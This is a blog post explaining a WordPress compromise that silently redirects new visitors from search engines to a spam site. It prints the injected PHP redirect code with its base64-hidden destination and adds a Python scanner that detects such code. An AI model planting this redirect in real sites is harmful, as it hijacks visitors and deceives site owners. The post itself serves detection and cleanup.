WordPress Redirect h4x’s

Lately I have noticed some people's blogs had been redirecting to some spammy landing page when you go to them from Google. I notified them about it and they thought I was nuts… because they could not reproduce it.

Donncha (wish your girlfriend was hot like me (sorry)) O Caoimh, the well-known WordPress developer, has made a great post about how sites are hacked and also what to look for.

Donncha has also pinpointed the redirect and cookie hack, which is very difficult to detect but is what I have suspected has been going on:

<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

The code above basically redirects people from your website to a site of the attacker's choice if:

1) they are coming from a search engine or other big referral site.
2) they have never visited your site before (no cookies are set).

It's pretty slick and very hard to detect since only NEW visitors would be affected.

Make sure you check all of your blogs for that code (in header.php).
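A small scanner for the check described above, as an added example rather than code from the original post or from Donncha's write-up. It flags PHP files that combine a referrer test with a Location redirect and decodes any base64_decode() string literals so the hidden destination is visible; the function names and the directory you point it at are assumptions.

```python
import base64
import re
from pathlib import Path

# Indicators taken from the injected snippet quoted above.
INDICATORS = {
    "referer_check": re.compile(r"\$_SERVER\[\s*['\"]HTTP_REFERER['\"]\s*\]"),
    "cookie_check": re.compile(r"\$_COOKIE"),
    "location_header": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "base64_decode": re.compile(r"base64_decode\s*\(", re.I),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

def decode_literals(php_source):
    """Return the decoded text of every base64_decode("...") string literal."""
    decoded = []
    for literal in B64_LITERAL.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:
            decoded.append("<undecodable: %s>" % literal)
    return decoded

def scan_source(php_source):
    """Report which indicators appear and whether the file needs review."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))
    # A redirect that depends on the referrer is the core of this hack;
    # the cookie test and base64 only make it harder to notice.
    suspicious = "referer_check" in hits and "location_header" in hits
    return {"hits": hits, "suspicious": suspicious, "decoded": decode_literals(php_source)}

def scan_tree(root):
    """Scan every .php file under root (for example a themes directory)."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        result = scan_source(path.read_text(errors="replace"))
        if result["suspicious"]:
            findings[str(path)] = result
    return findings

# Constructed sample: the snippet from the post, shortened, as it would sit in header.php.
SAMPLE = '''<?php $seref=array("google","msn"); $ser=0;
foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>'''
CLEAN = '<?php if (!isset($_COOKIE["seen"])) { setcookie("seen", "1"); } ?>'

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

A hit is a prompt for manual review, not proof of compromise, and a variant that builds its strings differently would need extra patterns.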
